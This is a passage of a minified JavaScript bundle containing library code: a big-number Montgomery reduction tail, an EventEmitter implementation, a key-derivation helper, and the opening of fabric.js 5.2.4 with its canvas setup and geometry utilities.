f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},8227:Pe=>{"use strict";var ie,we="object"==typeof Reflect?Reflect:null,de=we&&"function"==typeof we.apply?we.apply:function(U,K,ee){return Function.prototype.apply.call(U,K,ee)};ie=we&&"function"==typeof we.ownKeys?we.ownKeys:Object.getOwnPropertySymbols?function(U){return Object.getOwnPropertyNames(U).concat(Object.getOwnPropertySymbols(U))}:function(U){return Object.getOwnPropertyNames(U)};var $=Number.isNaN||function(U){return U!=U};function ae(){ae.init.call(this)}Pe.exports=ae,Pe.exports.once=function w(O,U){return new Promise(function(K,ee){function se(le){O.removeListener(U,ve),ee(le)}function ve(){"function"==typeof O.removeListener&&O.removeListener("error",se),K([].slice.call(arguments))}S(O,U,ve,{once:!0}),"error"!==U&&function x(O,U,K){"function"==typeof O.on&&S(O,"error",U,K)}(O,se,{once:!0})})},ae.EventEmitter=ae,ae.prototype._events=void 0,ae.prototype._eventsCount=0,ae.prototype._maxListeners=void 0;var I=10;function Q(O){if("function"!=typeof O)throw new TypeError('The "listener" argument must be of type Function. Received type '+typeof O)}function F(O){return void 0===O._maxListeners?ae.defaultMaxListeners:O._maxListeners}function E(O,U,K,ee){var se,ve,le;if(Q(K),void 0===(ve=O._events)?(ve=O._events=Object.create(null),O._eventsCount=0):(void 0!==ve.newListener&&(O.emit("newListener",U,K.listener?K.listener:K),ve=O._events),le=ve[U]),void 0===le)le=ve[U]=K,++O._eventsCount;else if("function"==typeof le?le=ve[U]=ee?[K,le]:[le,K]:ee?le.unshift(K):le.push(K),(se=F(O))>0&&le.length>se&&!le.warned){le.warned=!0;var ye=new Error("Possible EventEmitter memory leak detected. "+le.length+" "+String(U)+" listeners added. Use emitter.setMaxListeners() to increase limit");ye.name="MaxListenersExceededWarning",ye.emitter=O,ye.type=U,ye.count=le.length,function j(O){console&&console.warn&&console.warn(O)}(ye)}return O}function g(){if(!this.fired)return this.target.removeListener(this.type,this.wrapFn),this.fired=!0,0===arguments.length?this.listener.call(this.target):this.listener.apply(this.target,arguments)}function b(O,U,K){var ee={fired:!1,wrapFn:void 0,target:O,type:U,listener:K},se=g.bind(ee);return se.listener=K,ee.wrapFn=se,se}function _(O,U,K){var ee=O._events;if(void 0===ee)return[];var se=ee[U];return void 0===se?[]:"function"==typeof se?K?[se.listener||se]:[se]:K?function D(O){for(var U=new Array(O.length),K=0;K<U.length;++K)U[K]=O[K].listener||O[K];return U}(se):M(se,se.length)}function y(O){var U=this._events;if(void 0!==U){var K=U[O];if("function"==typeof K)return 1;if(void 0!==K)return K.length}return 0}function M(O,U){for(var K=new Array(U),ee=0;ee<U;++ee)K[ee]=O[ee];return K}function S(O,U,K,ee){if("function"==typeof O.on)ee.once?O.once(U,K):O.on(U,K);else{if("function"!=typeof O.addEventListener)throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type '+typeof O);O.addEventListener(U,function se(ve){ee.once&&O.removeEventListener(U,se),K(ve)})}}Object.defineProperty(ae,"defaultMaxListeners",{enumerable:!0,get:function(){return I},set:function(O){if("number"!=typeof O||O<0||$(O))throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received '+O+".");I=O}}),ae.init=function(){(void 0===this._events||this._events===Object.getPrototypeOf(this)._events)&&(this._events=Object.create(null),this._eventsCount=0),this._maxListeners=this._maxListeners||void 0},ae.prototype.setMaxListeners=function(U){if("number"!=typeof U||U<0||$(U))throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received '+U+".");return this._maxListeners=U,this},ae.prototype.getMaxListeners=function(){return F(this)},ae.prototype.emit=function(U){for(var K=[],ee=1;ee<arguments.length;ee++)K.push(arguments[ee]);var se="error"===U,ve=this._events;if(void 0!==ve)se=se&&void 0===ve.error;else if(!se)return!1;if(se){var le;if(K.length>0&&(le=K[0]),le instanceof Error)throw le;var ye=new Error("Unhandled error."+(le?" ("+le.message+")":""));throw ye.context=le,ye}var z=ve[U];if(void 0===z)return!1;if("function"==typeof z)de(z,this,K);else{var l=z.length,f=M(z,l);for(ee=0;ee<l;++ee)de(f[ee],this,K)}return!0},ae.prototype.on=ae.prototype.addListener=function(U,K){return E(this,U,K,!1)},ae.prototype.prependListener=function(U,K){return E(this,U,K,!0)},ae.prototype.once=function(U,K){return Q(K),this.on(U,b(this,U,K)),this},ae.prototype.prependOnceListener=function(U,K){return Q(K),this.prependListener(U,b(this,U,K)),this},ae.prototype.off=ae.prototype.removeListener=function(U,K){var ee,se,ve,le,ye;if(Q(K),void 0===(se=this._events))return this;if(void 0===(ee=se[U]))return this;if(ee===K||ee.listener===K)0==--this._eventsCount?this._events=Object.create(null):(delete se[U],se.removeListener&&this.emit("removeListener",U,ee.listener||K));else if("function"!=typeof ee){for(ve=-1,le=ee.length-1;le>=0;le--)if(ee[le]===K||ee[le].listener===K){ye=ee[le].listener,ve=le;break}if(ve<0)return this;0===ve?ee.shift():function p(O,U){for(;U+1<O.length;U++)O[U]=O[U+1];O.pop()}(ee,ve),1===ee.length&&(se[U]=ee[0]),void 0!==se.removeListener&&this.emit("removeListener",U,ye||K)}return this},ae.prototype.removeAllListeners=function(U){var K,ee,se;if(void 0===(ee=this._events))return this;if(void 0===ee.removeListener)return 0===arguments.length?(this._events=Object.create(null),this._eventsCount=0):void 0!==ee[U]&&(0==--this._eventsCount?this._events=Object.create(null):delete ee[U]),this;if(0===arguments.length){var le,ve=Object.keys(ee);for(se=0;se<ve.length;++se)"removeListener"!==(le=ve[se])&&this.removeAllListeners(le);return this.removeAllListeners("removeListener"),this._events=Object.create(null),this._eventsCount=0,this}if("function"==typeof(K=ee[U]))this.removeListener(U,K);else if(void 0!==K)for(se=K.length-1;se>=0;se--)this.removeListener(U,K[se]);return this},ae.prototype.listeners=function(U){return _(this,U,!0)},ae.prototype.rawListeners=function(U){return _(this,U,!1)},ae.listenerCount=function(O,U){return"function"==typeof O.listenerCount?O.listenerCount(U):y.call(O,U)},ae.prototype.listenerCount=y,ae.prototype.eventNames=function(){return this._eventsCount>0?ie(this._events):[]}},1851:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(807);Pe.exports=function $(ae,I,Q,F){if(ie.isBuffer(ae)||(ae=ie.from(ae,"binary")),I&&(ie.isBuffer(I)||(I=ie.from(I,"binary")),8!==I.length))throw new RangeError("salt should be Buffer with 8 byte length");for(var E=Q/8,g=ie.alloc(E),b=ie.alloc(F||0),_=ie.alloc(0);E>0||F>0;){var y=new j;y.update(_),y.update(ae),I&&y.update(I),_=y.digest();var M=0;if(E>0){var p=g.length-E;M=Math.min(E,_.length),_.copy(g,p,0,M),E-=M}if(M<_.length&&F>0){var D=b.length-F,w=Math.min(F,_.length-M);_.copy(b,D,M,M+w),F-=w}}return _.fill(0),{key:g,iv:b}}},4968:(Pe,we,de)=>{var E,g,b,_,y,M,ie=de(5449).Buffer,j=j||{version:"5.2.4"};if(we.fabric=j,"undefined"!=typeof document&&"undefined"!=typeof window)j.document=document instanceof("undefined"!=typeof HTMLDocument?HTMLDocument:Document)?document:document.implementation.createHTMLDocument(""),j.window=window;else{var ae=new(de(4960).JSDOM)(decodeURIComponent("%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3C%2Fhead%3E%3Cbody%3E%3C%2Fbody%3E%3C%2Fhtml%3E"),{features:{FetchExternalResources:["img"]},resources:"usable"}).window;j.document=ae.document,j.jsdomImplForWrapper=de(6759).implForWrapper,j.nodeCanvas=de(6272).Canvas,j.window=ae,DOMParser=j.window.DOMParser}function Q(E,g){var b=E.canvas,_=g.targetCanvas,y=_.getContext("2d");y.translate(0,_.height),y.scale(1,-1),y.drawImage(b,0,b.height-_.height,_.width,_.height,0,0,_.width,_.height)}function F(E,g){var _=g.targetCanvas.getContext("2d"),y=g.destinationWidth,M=g.destinationHeight,p=y*M*4,D=new Uint8Array(this.imageBuffer,0,p),w=new Uint8ClampedArray(this.imageBuffer,0,p);E.readPixels(0,0,y,M,E.RGBA,E.UNSIGNED_BYTE,D);var x=new ImageData(w,y,M);_.putImageData(x,0,0)}j.isTouchSupported="ontouchstart"in j.window||"ontouchstart"in j.document||j.window&&j.window.navigator&&j.window.navigator.maxTouchPoints>0,j.isLikelyNode=void 0!==ie&&"undefined"==typeof window,j.SHARED_ATTRIBUTES=["display","transform","fill","fill-opacity","fill-rule","opacity","stroke","stroke-dasharray","stroke-linecap","stroke-dashoffset","stroke-linejoin","stroke-miterlimit","stroke-opacity","stroke-width","id","paint-order","vector-effect","instantiated_by_use","clip-path"],j.DPI=96,j.reNum="(?:[-+]?(?:\\d+|\\d*\\.\\d+)(?:[eE][-+]?\\d+)?)",j.commaWsp="(?:\\s+,?\\s*|,\\s*)",j.rePathCommand=/([-+]?((\d+\.\d+)|((\d+)|(\.\d+)))(?:[eE][-+]?\d+)?)/gi,j.reNonWord=/[ \n\.,;!\?\-]/,j.fontPaths={},j.iMatrix=[1,0,0,1,0,0],j.svgNS="http://www.w3.org/2000/svg",j.perfLimitSizeTotal=2097152,j.maxCacheSideLimit=4096,j.minCacheSideLimit=256,j.charWidthsCache={},j.textureSize=2048,j.disableStyleCopyPaste=!1,j.enableGLFiltering=!0,j.devicePixelRatio=j.window.devicePixelRatio||j.window.webkitDevicePixelRatio||j.window.mozDevicePixelRatio||1,j.browserShadowBlurConstant=1,j.arcToSegmentsCache={},j.boundsOfCurveCache={},j.cachesBoundsOfCurve=!0,j.forceGLPutImageData=!1,j.initFilterBackend=function(){return j.enableGLFiltering&&j.isWebglSupported&&j.isWebglSupported(j.textureSize)?(console.log("max texture size: "+j.maxTextureSize),new j.WebglFilterBackend({tileSize:j.textureSize})):j.Canvas2dFilterBackend?new j.Canvas2dFilterBackend:void 0},"undefined"!=typeof document&&"undefined"!=typeof window&&(window.fabric=j),function(){function E(p,D){if(this.__eventListeners[p]){var w=this.__eventListeners[p];D?w[w.indexOf(D)]=!1:j.util.array.fill(w,!1)}}function b(p,D){var w=function(){D.apply(this,arguments),this.off(p,w)}.bind(this);this.on(p,w)}j.Observable={fire:function M(p,D){if(!this.__eventListeners)return this;var w=this.__eventListeners[p];if(!w)return this;for(var x=0,S=w.length;x<S;x++)w[x]&&w[x].call(this,D||{});return this.__eventListeners[p]=w.filter(function(O){return!1!==O}),this},on:function g(p,D){if(this.__eventListeners||(this.__eventListeners={}),1===arguments.length)for(var w in p)this.on(w,p[w]);else this.__eventListeners[p]||(this.__eventListeners[p]=[]),this.__eventListeners[p].push(D);return this},once:function _(p,D){if(1===arguments.length)for(var w in p)b.call(this,w,p[w]);else b.call(this,p,D);return this},off:function y(p,D){if(!this.__eventListeners)return this;if(0===arguments.length)for(p in this.__eventListeners)E.call(this,p);else if(1===arguments.length&&"object"==typeof arguments[0])for(var w in p)E.call(this,w,p[w]);else E.call(this,p,D);return this}}}(),j.Collection={_objects:[],add:function(){if(this._objects.push.apply(this._objects,arguments),this._onObjectAdded)for(var E=0,g=arguments.length;E<g;E++)this._onObjectAdded(arguments[E]);return this.renderOnAddRemove&&this.requestRenderAll(),this},insertAt:function(E,g,b){var _=this._objects;return b?_[g]=E:_.splice(g,0,E),this._onObjectAdded&&this._onObjectAdded(E),this.renderOnAddRemove&&this.requestRenderAll(),this},remove:function(){for(var g,E=this._objects,b=!1,_=0,y=arguments.length;_<y;_++)-1!==(g=E.indexOf(arguments[_]))&&(b=!0,E.splice(g,1),this._onObjectRemoved&&this._onObjectRemoved(arguments[_]));return this.renderOnAddRemove&&b&&this.requestRenderAll(),this},forEachObject:function(E,g){for(var b=this.getObjects(),_=0,y=b.length;_<y;_++)E.call(g,b[_],_,b);return this},getObjects:function(E){return void 0===E?this._objects.concat():this._objects.filter(function(g){return g.type===E})},item:function(E){return this._objects[E]},isEmpty:function(){return 0===this._objects.length},size:function(){return this._objects.length},contains:function(E,g){return this._objects.indexOf(E)>-1||!!g&&this._objects.some(function(b){return"function"==typeof b.contains&&b.contains(E,!0)})},complexity:function(){return this._objects.reduce(function(E,g){return E+(g.complexity?g.complexity():0)},0)}},j.CommonMethods={_setOptions:function(E){for(var g in E)this.set(g,E[g])},_initGradient:function(E,g){E&&E.colorStops&&!(E instanceof j.Gradient)&&this.set(g,new j.Gradient(E))},_initPattern:function(E,g,b){!E||!E.source||E instanceof j.Pattern?b&&b():this.set(g,new j.Pattern(E,b))},_setObject:function(E){for(var g in E)this._set(g,E[g])},set:function(E,g){return"object"==typeof E?this._setObject(E):this._set(E,g),this},_set:function(E,g){this[E]=g},toggle:function(E){var g=this.get(E);return"boolean"==typeof g&&this.set(E,!g),this},get:function(E){return this[E]}},E=we,g=Math.sqrt,b=Math.atan2,_=Math.pow,y=Math.PI/180,M=Math.PI/2,j.util={cos:function(p){if(0===p)return 1;switch(p<0&&(p=-p),p/M){case 1:case 3:return 0;case 2:return-1}return Math.cos(p)},sin:function(p){if(0===p)return 0;var w=1;switch(p<0&&(w=-1),p/M){case 1:return w;case 2:return 0;case 3:return-w}return Math.sin(p)},removeFromArray:function(p,D){var w=p.indexOf(D);return-1!==w&&p.splice(w,1),p},getRandomInt:function(p,D){return Math.floor(Math.random()*(D-p+1))+p},degreesToRadians:function(p){return p*y},radiansToDegrees:function(p){return p/y},rotatePoint:function(p,D,w){var x=new j.Point(p.x-D.x,p.y-D.y),S=j.util.rotateVector(x,w);return new j.Point(S.x,S.y).addEquals(D)},rotateVector:function(p,D){var w=j.util.sin(D),x=j.util.cos(D);return{x:p.x*x-p.y*w,y:p.x*w+p.y*x}},createVector:function(p,D){return new j.Point(D.x-p.x,D.y-p.y)},calcAngleBetweenVectors:function(p,D){return Math.acos((p.x*D.x+p.y*D.y)/(Math.hypot(p.x,p.y)*Math.hypot(D.x,D.y)))},getHatVector:function(p){return new j.Point(p.x,p.y).multiply(1/Math.hypot(p.x,p.y))},getBisector:function(p,D,w){var x=j.util.createVector(p,D),S=j.util.createVector(p,w),O=j.util.calcAngleBetweenVectors(x,S),U=j.util.calcAngleBetweenVectors(j.util.rotateVector(x,O),S);return{vector:j.util.getHatVector(j.util.rotateVector(x,O*(0===U?1:-1)/2)),angle:O}},projectStrokeOnPoints:function(p,D,w){var x=[],S=D.strokeWidth/2,O=D.strokeUniform?new j.Point(1/D.scaleX,1/D.scaleY):new j.Point(1,1),U=function(K){var ee=S/Math.hypot(K.x,K.y);return new j.Point(K.x*ee*O.x,K.y*ee*O.y)};return p.length<=1||p.forEach(function(K,ee){var ve,le,se=new j.Point(K.x,K.y);0===ee?(le=p[ee+1],ve=w?U(j.util.createVector(le,se)).addEquals(se):p[p.length-1]):ee===p.length-1?(ve=p[ee-1],le=w?U(j.util.createVector(ve,se)).addEquals(se):p[0]):(ve=p[ee-1],le=p[ee+1]);var f,A,ye=j.util.getBisector(se,ve,le),z=ye.vector;if("miter"===D.strokeLineJoin&&(f=-S/Math.sin(ye.angle/2),A=new j.Point(z.x*f*O.x,z.y*f*O.y),Math.hypot(A.x,A.y)/S<=D.strokeMiterLimit))return x.push(se.add(A)),void x.push(se.subtract(A));f=-S*Math.SQRT2,A=new j.Point(z.x*f*O.x,z.y*f*O.y),x.push(se.add(A)),x.push(se.subtract(A))}),x},transformPoint:function(p,D,w){return w?new j.Point(D[0]*p.x+D[2]*p.y,D[1]*p.x+D[3]*p.y):new j.Point(D[0]*p.x+D[2]*p.y+D[4],D[1]*p.x+D[3]*p.y+D[5])},makeBoundingBoxFromPoints:function(p,D){if(D)for(var w=0;w<p.length;w++)p[w]=j.util.transformPoint(p[w],D);var x=[p[0].x,p[1].x,p[2].x,p[3].x],S=j.util.array.min(x),U=j.util.array.max(x)-S,K=[p[0].y,p[1].y,p[2].y,p[3].y],ee=j.util.array.min(K);return{left:S,top:ee,width:U,height:j.util.array.max(K)-ee}},invertTransform:function(p){var D=1/(p[0]*p[3]-p[1]*p[2]),w=[D*p[3],-D*p[1],-D*p[2],D*p[0]],x=j.util.transformPoint({x:p[4],y:p[5]},w,!0);return w[4]=-x.x,w[5]=-x.y,w},toFixed:function(p,D){return parseFloat(Number(p).toFixed(D))},parseUnit:function(p,D){var w=/\D{0,2}$/.exec(p),x=parseFloat(p);switch(D||(D=j.Text.DEFAULT_SVG_FONT_SIZE),w[0]){case"mm":return x*j.DPI/25.4;case"cm":return x*j.DPI/2.54;case"in":return x*j.DPI;case"pt":return x*j.DPI/72;case"pc":return x*j.DPI/72*12;case"em":return x*D;default:return x}},falseFunction:function(){return!1},getKlass:function(p,D){return p=j.util.string.camelize(p.charAt(0).toUpperCase()+p.slice(1)),j.util.resolveNamespace(D)[p]},getSvgAttributes:function(p){var D=["instantiated_by_use","style","id","class"];switch(p){case"linearGradient":D=D.concat(["x1","y1","x2","y2","gradientUnits","gradientTransform"]);break;case"radialGradient":D=D.concat(["gradientUnits","gradientTransform","cx","cy","r","fx","fy","fr"]);break;case"stop":D=D.concat(["offset","stop-color","stop-opacity"])}return D},resolveNamespace:function(p){if(!p)return j;var x,D=p.split("."),w=D.length,S=E||j.window;for(x=0;x<w;++x)S=S[D[x]];return S},loadImage:function(p,D,w,x){if(p){var S=j.util.createImage(),O=function(){D&&D.call(w,S,!1),S=S.onload=S.onerror=null};S.onload=O,S.onerror=function(){j.log("Error loading "+S.src),D&&D.call(w,null,!0),S=S.onload=S.onerror=null},0!==p.indexOf("data")&&null!=x&&(S.crossOrigin=x),"data:image/svg"===p.substring(0,14)&&(S.onload=null,j.util.loadImageInDom(S,O)),S.src=p}else D&&D.call(w,p)},loadImageInDom:function(p,D){var w=j.document.createElement("div");w.style.width=w.style.height="1px",w.style.left=w.style.top="-100%",w.style.position="absolute",w.appendChild(p),j.document.querySelector("body").appendChild(w),p.onload=function(){D(),w.parentNode.removeChild(w),w=null}},enlivenObjects:function(p,D,w,x){var S=[],O=0,U=(p=p||[]).length;function K(){++O===U&&D&&D(S.filter(function(ee){return ee}))}U?p.forEach(function(ee,se){ee&&ee.type?j.util.getKlass(ee.type,w).fromObject(ee,function(le,ye){ye||(S[se]=le),x&&x(ee,le,ye),K()}):K()}):D&&D(S)},enlivenObjectEnlivables:function(p,D,w){var x=j.Object.ENLIVEN_PROPS.filter(function(S){return!!p[S]});j.util.enlivenObjects(x.map(function(S){return p[S]}),function(S){var O={};x.forEach(function(U,K){O[U]=S[K],D&&(D[U]=S[K])}),w&&w(O)})},enlivenPatterns:function(p,D){function w(){++S===O&&D&&D(x)}var x=[],S=0,O=(p=p||[]).length;O?p.forEach(function(U,K){U&&U.source?new j.Pattern(U,function(ee){x[K]=ee,w()}):(x[K]=U,w())}):D&&D(x)},groupSVGElements:function(p,D,w){var x;return p&&1===p.length?(void 0!==w&&(p[0].sourcePath=w),p[0]):(D&&(D.width&&D.height?D.centerPoint={x:D.width/2,y:D.height/2}:(delete D.width,delete D.height)),x=new j.Group(p,D),void 0!==w&&(x.sourcePath=w),x)},populateWithProperties:function(p,D,w){if(w&&Array.isArray(w))for(var x=0,S=w.length;x<S;x++)w[x]in p&&(D[w[x]]=p[w[x]])},createCanvasElement:function(){return j.document.createElement("canvas")},copyCanvasElement:function(p){var D=j.util.createCanvasElement();return D.width=p.width,D.height=p.height,D.getContext("2d").drawImage(p,0,0),D},toDataURL:function(p,D,w){return p.toDataURL("image/"+D,w)},createImage:function(){return j.document.createElement("img")},multiplyTransformMatrices:function(p,D,w){return[p[0]*D[0]+p[2]*D[1],p[1]*D[0]+p[3]*D[1],p[0]*D[2]+p[2]*D[3],p[1]*D[2]+p[3]*D[3],w?0:p[0]*D[4]+p[2]*D[5]+p[4],w?0:p[1]*D[4]+p[3]*D[5]+p[5]]},qrDecompose:function(p){var D=b(p[1],p[0]),w=_(p[0],2)+_(p[1],2),x=g(w),S=(p[0]*p[3]-p[2]*p[1])/x,O=b(p[0]*p[2]+p[1]*p[3],w);return{angle:D/y,scaleX:x,scaleY:S,skewX:O/y,skewY:0,translateX:p[4],translateY:p[5]}},calcRotateMatrix:function(p){if(!p.angle)return j.iMatrix.concat();var D=j.util.degreesToRadians(p.angle),w=j.util.cos(D),x=j.util.sin(D);return[w,x,-x,w,0,0]},calcDimensionsMatrix:function(p){var D=void 0===p.scaleX?1:p.scaleX,w=void 0===p.scaleY?1:p.scaleY,x=[p.flipX?-D:D,0,0,p.flipY?-w:w,0,0],S=j.util.multiplyTransformMatrices,O=j.util.degreesToRadians;return p.skewX&&(x=S(x,[1,0,Math.tan(O(p.skewX)),1],!0)),p.skewY&&(x=S(x,[1,Math.tan(O(p.skewY)),0,1],!0)),x},composeMatrix:function(p){var D=[1,0,0,1,p.translateX||0,p.translateY||0],w=j.util.multiplyTransformMatrices;return p.angle&&(D=w(D,j.util.calcRotateMatrix(p))),(1!==p.scaleX||1!==p.scaleY||p.skewX||p.skewY||p.flipX||p.flipY)&&(D=w(D,j.util.calcDimensionsMatrix(p))),D},resetObjectTransform:function(p){p.scaleX=1,p.scaleY=1,p.skewX=0,p.skewY=0,p.flipX=!1,p.flipY=!1,p.rotate(0)},saveObjectTransform:function(p){return{scaleX:p.scaleX,scaleY:p.scaleY,skewX:p.skewX,skewY:p.skewY,angle:p.angle,left:p.left,flipX:p.flipX,flipY:p.flipY,top:p.top}},isTransparent:function(p,D,w,x){x>0&&(D>x?D-=x:D=0,w>x?w-=x:w=0);var O,S=!0,K=p.getImageData(D,w,2*x||1,2*x||1),ee=K.data.length;for(O=3;O<ee&&0!=(S=K.data[O]<=0);O+=4);return K=null,S},parsePreserveAspectRatioAttribute:function(p){var O,D="meet",S=p.split(" ");return S&&S.length&&("meet"!==(D=S.pop())&&"slice"!==D?(O=D,D="meet"):S.length&&(O=S.pop())),{meetOrSlice:D,alignX:"none"!==O?O.slice(1,4):"none",alignY:"none"!==O?O.slice(5,8):"none"}},clearFabricFontCache:function(p){(p=(p||"").toLowerCase())?j.charWidthsCache[p]&&delete j.charWidthsCache[p]:j.charWidthsCache={}},limitDimsByArea:function(p,D){var w=Math.sqrt(D*p),x=Math.floor(D/w);return{x:Math.floor(w),y:x}},capValue:function(p,D,w){return Math.max(p,Math.min(D,w))},findScaleToFit:function(p,D){return Math.min(D.width/p.width,D.height/p.height)},findScaleToCover:function(p,D){return Math.max(D.width/p.width,D.height/p.height)},matrixToSVG:function(p){return"matrix("+p.map(function(D){return j.util.toFixed(D,j.Object.NUM_FRACTION_DIGITS)}).join(" ")+")"},removeTransformFromObject:function(p,D){var w=j.util.invertTransform(D),x=j.util.multiplyTransformMatrices(w,p.calcOwnMatrix());j.util.applyTransformToObject(p,x)},addTransformToObject:function(p,D){j.util.applyTransformToObject(p,j.util.multiplyTransformMatrices(D,p.calcOwnMatrix()))},applyTransformToObject:function(p,D){var w=j.util.qrDecompose(D),x=new j.Point(w.translateX,w.translateY);p.flipX=!1,p.flipY=!1,p.set("scaleX",w.scaleX),p.set("scaleY",w.scaleY),p.skewX=w.skewX,p.skewY=w.skewY,p.angle=w.angle,p.setPositionByOrigin(x,"center","center")},sizeAfterTransform:function(p,D,w){var x=p/2,S=D/2,O=[{x:-x,y:-S},{x,y:-S},{x:-x,y:S},{x,y:S}],U=j.util.calcDimensionsMatrix(w),K=j.util.makeBoundingBoxFromPoints(O,U);return{x:K.width,y:K.height}},mergeClipPaths:function(p,D){var w=p,x=D;w.inverted&&!x.inverted&&(w=D,x=p),j.util.applyTransformToObject(x,j.util.multiplyTransformMatrices(j.util.invertTransform(w.calcTransformMatrix()),x.calcTransformMatrix()));var S=w.inverted&&x.inverted;return S&&(w.inverted=x.inverted=!1),new j.Group([w],{clipPath:x,inverted:S})},hasStyleChanged:function(p,D,w){return w=w||!1,p.fill!==D.fill||p.stroke!==D.stroke||p.strokeWidth!==D.strokeWidth||p.fontSize!==D.fontSize||p.fontFamily!==D.fontFamily||p.fontWeight!==D.fontWeight||p.fontStyle!==D.fontStyle||p.deltaY!==D.deltaY||w&&(p.overline!==D.overline||p.underline!==D.underline||p.linethrough!==D.linethrough)},stylesToArray:function(w,D){w=j.util.object.clone(w,!0);for(var x=D.split("\n"),S=-1,O={},U=[],K=0;K<x.length;K++)if(w[K])for(var ee=0;ee<x[K].length;ee++){S++;var se=w[K][ee];se&&(j.util.hasStyleChanged(O,se,!0)?U.push({start:S,end:S+1,style:se}):U[U.length-1].end++),O=se||{}}else S+=x[K].length;return U},stylesFromArray:function(p,D){if(!Array.isArray(p))return p;for(var w=D.split("\n"),x=-1,S=0,O={},U=0;U<w.length;U++)for(var K=0;K<w[U].length;K++)x++,p[S]&&p[S].start<=x&&x<p[S].end&&(O[U]=O[U]||{},O[U][K]=Object.assign({},p[S].style),x===p[S].end-1&&S++);return O}},function(){var E=Array.prototype.join,g={m:2,l:2,h:1,v:1,c:6,s:4,q:4,t:2,a:7},b={m:"l",M:"L"};function _(h,R,J,Z,ue,Ie,Ae,Ue,Xe,He,Be){var qe=j.util.cos(h),De=j.util.sin(h),Ve=j.util.cos(R),ze=j.util.sin(R),me=J*ue*Ve-Z*Ie*ze+Ae,Ke=Z*ue*Ve+J*Ie*ze+Ue;return["C",He+Xe*(-J*ue*De-Z*Ie*qe),Be+Xe*(-Z*ue*De+J*Ie*qe),me+Xe*(J*ue*ze+Z*Ie*Ve),Ke+Xe*(Z*ue*ze-J*Ie*Ve),me,Ke]}function M(h,R,J,Z){var ue=Math.atan2(R,h),Ie=Math.atan2(Z,J);return Ie>=ue?Ie-ue:2*Math.PI-(ue-Ie)}function D(h,R,J){for(var Be=function y(h,R,J,Z,ue,Ie,Ae){var Ue=Math.PI,Xe=Ae*Ue/180,He=j.util.sin(Xe),Be=j.util.cos(Xe),qe=0,De=0,Ve=-Be*h*.5-He*R*.5,ze=-Be*R*.5+He*h*.5,me=(J=Math.abs(J))*J,Ke=(Z=Math.abs(Z))*Z,rt=ze*ze,Ge=Ve*Ve,Qe=me*Ke-me*rt-Ke*Ge,ht=0;if(Qe<0){var mt=Math.sqrt(1-Qe/(me*Ke));J*=mt,Z*=mt}else ht=(ue===Ie?-1:1)*Math.sqrt(Qe/(me*rt+Ke*Ge));var lt=ht*J*ze/Z,ft=-ht*Z*Ve/J,xe=Be*lt-He*ft+.5*h,We=He*lt+Be*ft+.5*R,Je=M(1,0,(Ve-lt)/J,(ze-ft)/Z),Oe=M((Ve-lt)/J,(ze-ft)/Z,(-Ve-lt)/J,(-ze-ft)/Z);0===Ie&&Oe>0?Oe-=2*Ue:1===Ie&&Oe<0&&(Oe+=2*Ue);for(var Te=Math.ceil(Math.abs(Oe/Ue*2)),Le=[],$e=Oe/Te,st=8/3*Math.sin($e/4)*Math.sin($e/4)/Math.sin($e/2),xt=Je+$e,pt=0;pt<Te;pt++)Le[pt]=_(Je,xt,Be,He,J,Z,xe,We,st,qe,De),qe=Le[pt][5],De=Le[pt][6],Je=xt,xt+=$e;return Le}(J[6]-h,J[7]-R,J[1],J[2],J[4],J[5],J[3]),qe=0,De=Be.length;qe<De;qe++)Be[qe][1]+=h,Be[qe][2]+=R,Be[qe][3]+=h,Be[qe][4]+=R,Be[qe][5]+=h,Be[qe][6]+=R;return Be}function x(h,R,J,Z){return Math.sqrt((J-h)*(J-h)+(Z-R)*(Z-R))}function ee(h,R,J,Z,ue,Ie,Ae,Ue){return function(Xe){var He=function S(h){return h*h*h}(Xe),Be=function O(h){return 3*h*h*(1-h)}(Xe),qe=function U(h){return 3*h*(1-h)*(1-h)}(Xe),De=function K(h){return(1-h)*(1-h)*(1-h)}(Xe);return{x:Ae*He+ue*Be+J*qe+h*De,y:Ue*He+Ie*Be+Z*qe+R*De}}}function se(h,R,J,Z,ue,Ie,Ae,Ue){return function(Xe){var He=1-Xe;return Math.atan2(3*He*He*(Z-R)+6*He*Xe*(Ie-Z)+3*Xe*Xe*(Ue-Ie),3*He*He*(J-h)+6*He*Xe*(ue-J)+3*Xe*Xe*(Ae-ue))}}function z(h,R,J,Z,ue,Ie){return function(Ae){var Ue=function ve(h){return h*h}(Ae),Xe=function le(h){return 2*h*(1-h)}(Ae),He=function ye(h){return(1-h)*(1-h)}(Ae);return{x:ue*Ue+J*Xe+h*He,y:Ie*Ue+Z*Xe+R*He}}}function l(h,R,J,Z,ue,Ie){return function(Ae){var Ue=1-Ae;return Math.atan2(2*Ue*(Z-R)+2*Ae*(Ie-Z),2*Ue*(J-h)+2*Ae*(ue-J))}}function f(h,R,J){var ue,Ae,Z={x:R,y:J},Ie=0;for(Ae=1;Ae<=100;Ae+=1)ue=h(Ae/100),Ie+=x(Z.x,Z.y,ue.x,ue.y),Z=ue;return Ie}function v(h){for(var 